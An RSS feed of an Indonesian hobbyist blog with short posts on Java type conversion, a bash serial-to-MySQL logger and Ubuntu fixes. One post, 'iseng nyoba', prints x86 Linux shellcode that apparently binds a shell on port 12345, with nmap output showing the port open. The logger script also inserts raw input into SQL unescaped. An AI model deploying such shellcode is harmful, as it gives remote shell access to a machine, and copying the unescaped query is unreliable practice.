<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>[+]akfcode</title>
	<atom:link href="http://akfcode.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://akfcode.wordpress.com</link>
	<description>[-]as simple as who i am, as complicated as my mind</description>
	<lastBuildDate>Tue, 22 Feb 2011 01:06:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='akfcode.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/96fa6810d07f07b9202e9791eed96b64?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>[+]akfcode</title>
		<link>http://akfcode.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://akfcode.wordpress.com/osd.xml" title="[+]akfcode" />
	<atom:link rel='hub' href='http://akfcode.wordpress.com/?pushpress=hub'/>
		<item>
		<title>fungsi auto increament dengan java</title>
		<link>http://akfcode.wordpress.com/2011/01/25/fungsi-auto-increament-dengan-java/</link>
		<comments>http://akfcode.wordpress.com/2011/01/25/fungsi-auto-increament-dengan-java/#comments</comments>
		<pubDate>Tue, 25 Jan 2011 04:17:50 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Java]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[fungsi auto increament java]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=100</guid>
		<description><![CDATA[bumi gonjang ganjing langit kelap kelap katooooonnnnn!!! ini ceritanya pas lagi iseng iseng dikerjain software Java dengan database postgresql, dimana di postgresql ini kok ya autoincreament gada kaya di mysql tho.. jadi pusing aku coba.. akhirnya nemu wangsit buat bikin dewe auto increamentnya huihuihuihui&#8230; oke singkat cerita ada database dengan tabel soal_ekskul, ada kolom namanya [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=100&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>bumi gonjang ganjing langit kelap kelap katooooonnnnn!!!<br />
ini ceritanya pas lagi iseng iseng dikerjain software Java dengan database postgresql, dimana di postgresql ini kok ya autoincreament gada kaya di mysql tho.. jadi pusing aku coba.. akhirnya nemu wangsit buat bikin dewe auto increamentnya huihuihuihui&#8230; <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
oke singkat cerita ada database dengan tabel soal_ekskul, ada kolom namanya &#8220;id&#8221; &lt;&#8211; untuk cek, kasi aja type data integer,  sambil nggabungin fungsi String to integer dan integer to String pada posting sebelumnya.. huihuihuihui<br />
ini routinnya:<br />
<pre class="brush: java;">
int m = 0;
            stmt = c.createStatement();
            String gedhang = &quot;select * from soal_ekskul order by id desc limit 1&quot;;
            ResultSet rsa = stmt.executeQuery(gedhang);
            while(rsa.next()){
            String tape = rsa.getString(&quot;id&quot;);
               
            int ketan = Integer.parseInt(tape);
            int klepon = ketan+1;
            String dangglem = Integer.toString(klepon);
            m = m+1;
</pre></p>
<p>tu dah&#8230; buat ngecek kasih aja System.out.println(dangglem) ato apalah&#8230; silahkan dimodif..<br />
eh.. yang punya kopi sama rokok dong&#8230;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/100/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=100&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2011/01/25/fungsi-auto-increament-dengan-java/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>konversi integer ke string di java</title>
		<link>http://akfcode.wordpress.com/2011/01/25/konversi-integer-ke-string-di-java/</link>
		<comments>http://akfcode.wordpress.com/2011/01/25/konversi-integer-ke-string-di-java/#comments</comments>
		<pubDate>Tue, 25 Jan 2011 04:06:51 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Java]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[convert integer to string in java]]></category>
		<category><![CDATA[integer ke string di java]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=98</guid>
		<description><![CDATA[heuuuhhh&#8230;. kalo kemaren post tentang konversi type data string ke integer, sekarang di balik dari integer ke string&#8230; huihuihuihuihui&#8230; sama kayak posting sebelumnya.. test it..<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=98&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>heuuuhhh&#8230;. kalo kemaren post tentang konversi type data string ke integer, sekarang di balik dari integer ke string&#8230; huihuihuihuihui&#8230;<br />
sama kayak posting sebelumnya..<br />
<pre class="brush: java;">
public class inttostring {

	public static void main (String args[]) {
		int dua = 2;
		String duwe = Integer.toString(dua);
		System.out.println(&quot;angka &quot; + duwe + &quot; dalam bahasa Madura adalah duwe&quot;);	

	}
}
</pre></p>
<p>test it.. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/98/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/98/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/98/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=98&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2011/01/25/konversi-integer-ke-string-di-java/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>konversi string ke integer di Java</title>
		<link>http://akfcode.wordpress.com/2011/01/21/konversi-string-ke-integer-di-java/</link>
		<comments>http://akfcode.wordpress.com/2011/01/21/konversi-string-ke-integer-di-java/#comments</comments>
		<pubDate>Fri, 21 Jan 2011 10:26:03 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Java]]></category>
		<category><![CDATA[java string ke integer]]></category>
		<category><![CDATA[konversi string ke integer]]></category>
		<category><![CDATA[string to integer java]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=94</guid>
		<description><![CDATA[senja&#8230; selalu menghadirkan asa.. begitulah sedikit kepercayaanku ketika senja.. posting ini sebenernya inspirasinya ketika cangkrukan di Kantin dan minum kopi plus menghisap rokok bersama sobat &#8211; sobatku, kebetulan ada sedikit slenthingan sama temenku Heru W. a.k.a DOP tentang konversi string ke integer pada pemrograman Java. yang walhasil, berhasil deh.. ini ada sedikit contohnya, langsung saja: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=94&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>senja&#8230; selalu menghadirkan asa..<br />
begitulah sedikit kepercayaanku ketika senja.. posting ini sebenernya inspirasinya ketika cangkrukan di Kantin dan minum kopi plus menghisap rokok bersama sobat &#8211; sobatku, kebetulan ada sedikit slenthingan sama temenku <a href="http://localhost80.wordpress.com">Heru W. a.k.a DOP</a> tentang konversi string ke integer pada pemrograman Java. yang walhasil, berhasil deh.. ini ada sedikit contohnya, langsung saja:<br />
berikutlah sedikit kodenya:<br />
<pre class="brush: java; wrap-lines: false;">
public class stringtoint {

	public static void main (String args[]) {	
		int dua = 2;
		String satu = &quot;1&quot;;
		int setunggal = Integer.parseInt(satu);
		System.out.println(dua + setunggal);	
		
	}
}

</pre></p>
<p>oke penjelasannya adalah, bahwa variable satu bertipe data String, dan variable setunggal adalah hasil konversi variable &#8220;satu&#8221; menjadi integer, kemudian ditambahkan dengan varible &#8220;dua&#8221; yang bertipe data integer menghasilkan angka &#8220;3&#8243;, oke sekian dulu. saya menikmati senja lagi..</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/94/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/94/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/94/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=94&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2011/01/21/konversi-string-ke-integer-di-java/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>membaca serial2usb dan menginputkan data ke mysql via shellscriptting linux</title>
		<link>http://akfcode.wordpress.com/2011/01/17/membaca-serial2usb-dan-menginputkan-data-ke-mysql-via-shellscriptting-linux/</link>
		<comments>http://akfcode.wordpress.com/2011/01/17/membaca-serial2usb-dan-menginputkan-data-ke-mysql-via-shellscriptting-linux/#comments</comments>
		<pubDate>Mon, 17 Jan 2011 23:10:40 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[shell script]]></category>
		<category><![CDATA[instrumen]]></category>
		<category><![CDATA[mysql bash]]></category>
		<category><![CDATA[serial2usb]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=92</guid>
		<description><![CDATA[hooo&#8230; lama juga gak update blog yak.. oke deh sedikit sharing aja, ini ceritanya adalah nemuin arsip lama, yaitu program kecil buat baca data sensor dan memasukkan data ke Database mysql, dengan susunan peralatan sbb: oke lanjut bos, untuk mengetahui serial2usb konverternya kebaca apa tuh anak di linux, pake perintah ini ntar ketahuan misal /dev/ttyACM0 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=92&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>hooo&#8230; lama juga gak update blog yak.. oke deh sedikit sharing aja, ini ceritanya adalah nemuin arsip lama, yaitu program kecil buat baca data sensor dan memasukkan data ke Database mysql, dengan susunan peralatan sbb:</p>
<p><pre class="brush: plain; wrap-lines: false;">
sensor -&gt; mikrokontroler -&gt; serial2usb converter -&gt; komputer include server mysql
</pre></p>
<p>oke lanjut bos, untuk mengetahui serial2usb konverternya kebaca apa tuh anak di linux, pake perintah ini</p>
<p><pre class="brush: plain; wrap-lines: false;">
dmesg | grep tty
</pre></p>
<p>ntar ketahuan misal <strong>/dev/ttyACM0</strong><br />
dan misal di mysql ada database dengan nama &#8220;Fisika&#8221; dengan table &#8220;data&#8221; dan columns &#8220;id, suhu, waktu&#8221;, dan kita pengin masukkin data ke situ, jadi gak usa lama lama ya pegel ini..</p>
<p>oke berikut source program buat baca</p>
<p><pre class="brush: plain; wrap-lines: false;">
#!/bin/bash
# inisialisasi untuk server, user dan pwd mysql
HOST=&quot;localhost&quot;;
USER=&quot;user_disini&quot;;
PWD=&quot;password_terserah_cuk&quot;;
#mulai
#disini usbtoserial kebaca ACM0
#READ=`cat /dev/ttyACM0`
while true
do
#time=`date +%a-%b-%Y:%T`
time=`date +%a-%b-%Y:%T`
sleep 1
clear
read READ &lt; /dev/ttyACM0
# proses baca dari serial2usb
echo $READ
sleep 1
#bagian untuk memasukkan data ke mysql
#database:FISIKA tabel:data kolom:(id,suhu,waktu)
echo &quot;USE fisika; INSERT INTO data (id,suhu,waktu) VALUES ('','$READ','$time');&quot; &gt; /tmp/query.sql;
 
# eksekusi queery
results=`mysql -h $HOST -u $USER -p$PWD &lt; /tmp/query.sql`;

done

</pre></p>
<p>oke friend, test it. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/92/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=92&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2011/01/17/membaca-serial2usb-dan-menginputkan-data-ke-mysql-via-shellscriptting-linux/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>iseng nyoba</title>
		<link>http://akfcode.wordpress.com/2010/10/15/iseng-nyoba/</link>
		<comments>http://akfcode.wordpress.com/2010/10/15/iseng-nyoba/#comments</comments>
		<pubDate>Fri, 15 Oct 2010 02:06:46 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[c]]></category>
		<category><![CDATA[hacknowledge]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=87</guid>
		<description><![CDATA[scan:<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=87&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><pre class="brush: cpp; wrap-lines: false;">
#include &lt;stdio.h&gt;
char shell[] = &quot;\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80&quot;
&quot;\x96\x43\x52\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x66\x58\x50&quot;
&quot;\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56&quot;
&quot;\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89&quot;
&quot;\xdf\xff\xe1&quot;;
int main(void) {
       ((void (*)(void))shell)(); // str()
        return 0;
}
</pre></p>
<p>scan:<br />
<pre class="brush: plain; wrap-lines: false;">
root@deepmind:~# nmap localhost

Starting Nmap 5.00 ( http://nmap.org ) at 2010-10-15 08:51 WIT
Interesting ports on localhost (127.0.0.1):
Not shown: 999 closed ports
PORT      STATE SERVICE
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
</pre></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/87/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=87&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2010/10/15/iseng-nyoba/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>memunculkan icon Network Manager di ubuntu 10.04</title>
		<link>http://akfcode.wordpress.com/2010/10/06/memunculkan-icon-network-manager-di-ubuntu-10-04/</link>
		<comments>http://akfcode.wordpress.com/2010/10/06/memunculkan-icon-network-manager-di-ubuntu-10-04/#comments</comments>
		<pubDate>Wed, 06 Oct 2010 18:49:10 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[whatever]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=85</guid>
		<description><![CDATA[sedikit catatan:fuuuuuuuuuhhhh.. tulisan ini ditulis 3 hari menjelang releasenya ubuntu 10.10, dan saya tidak berencana me-clean install ubuntu 10.04 saya dengan 10.10, karena capek, mending dist-upgrade aja ntar. oke ceritanya saya sering menemukan kejadian bahwa icon Network Manager di bagian kanan atas sering menghilang setelah booting, dan ternyata kayaknya kok banyak yang dapatin seperti ini, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=85&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>sedikit catatan:fuuuuuuuuuhhhh.. tulisan ini ditulis 3 hari menjelang releasenya ubuntu 10.10, dan saya tidak berencana me-clean install ubuntu 10.04 saya dengan 10.10, karena capek, mending dist-upgrade aja ntar.</p>
<p>oke ceritanya saya sering menemukan kejadian bahwa icon Network Manager di bagian kanan atas sering menghilang setelah booting, dan ternyata kayaknya kok banyak yang dapatin seperti ini, nah ini solusinya tanpa reboot, biar gak ribet</p>
<p>edit file <strong>/etc/NetworkManager/nm-system-settings.conf</strong><br />
seperti ini<br />
<pre class="brush: plain;">
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=true

</pre></p>
<p>lalu dari terminal ketikkan:<br />
<pre class="brush: plain;">
killall gnome-panel
</pre></p>
<p>dan taraaaaaa muncul lagi tuh anak <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/akfcode.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/akfcode.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/akfcode.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/akfcode.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/akfcode.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/akfcode.wordpress.com/85/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/akfcode.wordpress.com/85/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/akfcode.wordpress.com/85/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=85&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://akfcode.wordpress.com/2010/10/06/memunculkan-icon-network-manager-di-ubuntu-10-04/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e0667eee4f8d6b8b9fd94b4046646644?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">akfcode</media:title>
		</media:content>
	</item>
		<item>
		<title>fixing error &#8220;Dynamic MMap ran out of room&#8221; di debian</title>
		<link>http://akfcode.wordpress.com/2010/10/06/fixing-error-dynamic-mmap-ran-out-of-room-di-debian/</link>
		<comments>http://akfcode.wordpress.com/2010/10/06/fixing-error-dynamic-mmap-ran-out-of-room-di-debian/#comments</comments>
		<pubDate>Wed, 06 Oct 2010 11:22:18 +0000</pubDate>
		<dc:creator>AKF</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[whatever]]></category>
		<category><![CDATA[apt-get error]]></category>

		<guid isPermaLink="false">http://akfcode.wordpress.com/?p=83</guid>
		<description><![CDATA[huuuuuuffffff (ekspresi lebay) mendapat sedikit masalah ketika melakukan update di ubuntu saya let&#8217;s the words show: 1.duduk permasalahan: 2. lalu mencoba: hmmmmmm masalah ada di bagian 3. lalu fixingnya: 4.hasilnya sip&#8230; bisa di update dan upgrade lagi<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=akfcode.wordpress.com&amp;blog=15834463&amp;post=83&amp;subd=akfcode&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>huuuuuuffffff (ekspresi lebay) mendapat sedikit masalah ketika melakukan update di ubuntu saya <img src='http://s0.wp.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /><br />
let&#8217;s the words show:</p>
<p>1.duduk permasalahan:<br />
<pre class="brush: plain; wrap-lines: false;">
shadow@puppet:~$ sudo apt-get upgrade
Reading package lists... Error!
E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
E: Error occurred while processing libgtksourceview2.0-0 (NewFileVer1)
E: Problem with MergeList /var/lib/dpkg/status
W: Unable to munmap
E: The package lists or status file could not be parsed or opened.
</pre></p>
<p>2. lalu mencoba:<br />
<pre class="brush: plain; wrap-lines: false;">
shadow@puppet:~$ sudo apt-get autoclean
Reading package lists... Error!
E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
E: Error occurred while processing libgtksourceview2.0-0 (NewFileVer1)
E: Problem with MergeList /var/lib/dpkg/status
W: Unable to munmap
E: The package lists or status file could not be parsed or opened.
</pre></p>
<p>hmmmmmm <img src='http://s0.wp.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  masalah ada di bagian<br />
<span id="more-83"></span><br />
<pre class="brush: plain; wrap-lines: false;">
E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
</pre></p>
<p>3. lalu fixingnya:<br />
<pre class="brush: plain; wrap-lines: false;">
root@puppet:/etc/apt/apt.conf.d# cat &lt;&lt; EOF &gt;&gt; /etc/apt/apt.conf
&gt; APT::Cache-Limit &quot;30000000&quot;; [enter]
&gt; EOF [enter]

</pre></p>
